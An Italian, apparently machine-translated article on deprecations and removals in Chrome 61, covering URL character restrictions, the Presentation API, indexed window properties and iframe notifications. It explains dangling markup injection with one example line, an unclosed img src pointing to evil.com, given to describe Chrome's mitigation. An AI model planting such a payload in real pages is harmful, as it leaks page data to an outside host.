In quasi tutte le versioni di Chrome, notiamo un numero significativo di aggiornamenti e miglioramenti al prodotto, alle sue prestazioni e anche alle funzionalità della piattaforma web. Questo articolo descrive i ritiri e le rimozioni in Chrome 61, in versione beta a partire dal 3 agosto. Questo elenco è soggetto a modifiche in qualsiasi momento.
Sicurezza e privacy
Blocca le risorse i cui URL contengono i caratteri "\n" e "<"
Esiste un tipo di pirateria informatica chiamato iniezione di markup del pericolo in cui un URL troncato viene utilizzato per inviare dati a un endpoint esterno. Ad esempio,
considera una pagina contenente <img src='https://evil.com/?. Poiché l'URL non contiene virgolette di chiusura, i browser leggeranno le virgolette successive e tratteranno i caratteri racchiusi come se fossero un singolo URL.
Chrome 61 mitiga questa vulnerabilità limitando i set di caratteri consentiti negli attributi href e src. In particolare, Chrome interromperà l'elaborazione degli URL quando rileva caratteri di nuova riga (\n) e minori di caratteri (<).
Gli sviluppatori con un caso d'uso legittimo per i caratteri di nuova riga e meno di caratteri in un URL devono invece eseguire l'escape di questi caratteri.
Intent di rimozione | Tracker di stato di Chrome | Bug di Chromium
Ritira e rimuovi l'API Presentation in contesti non sicuri
È stato riscontrato che, su origini non sicure, l'API Presentation può essere utilizzata come vettore di pirateria informatica su origini non sicure. Poiché i display non hanno barre degli indirizzi, l'API può essere usata per lo spoofing dei contenuti. È anche possibile esfiltrare i dati dalla presentazione in esecuzione.
In linea con l'intenzione di Blink di rimuovere funzionalità potenti su origini non sicure, prevediamo di ritirare e rimuovere il supporto per l'API Presentation in contesti non sicuri. A partire da Chrome
61, PresentationRequest.start() non funzionerà più su origini non sicure.
Intent di rimozione | Tracker di stato di Chrome | Bug di Chromium
JavaScript
Non consentire la definizione delle proprietà indicizzate nelle finestre
In precedenza, alcuni browser consentivano le assegnazioni JavaScript come le seguenti:
window[0] = 1;
La specifica HTML corrente indica che si tratta di una violazione esplicita della specifica JavaScript. Di conseguenza, questa funzionalità è stata rimossa in Chrome 61. Da febbraio 2016, Firefox è già conforme.
Rimuovi l'utilizzo delle notifiche da iframe non sicuri
Le richieste di autorizzazione dagli iframe possono confondere gli utenti poiché è difficile distinguere l'origine della pagina che la contiene dall'origine dell'iframe che effettua la richiesta. Se l'ambito delle richieste non è chiaro, è difficile per gli utenti valutare se concedere o negare l'autorizzazione.
Se non consenti le notifiche negli iframe, verranno allineati anche i requisiti per le autorizzazioni di notifica con quelli delle notifiche push, semplificando le cose per gli sviluppatori.
Gli sviluppatori che hanno bisogno di questa funzionalità possono aprire una nuova finestra per richiedere l'autorizzazione alle notifiche.
Intent di rimozione | Tracker di stato di Chrome | Bug di Chromium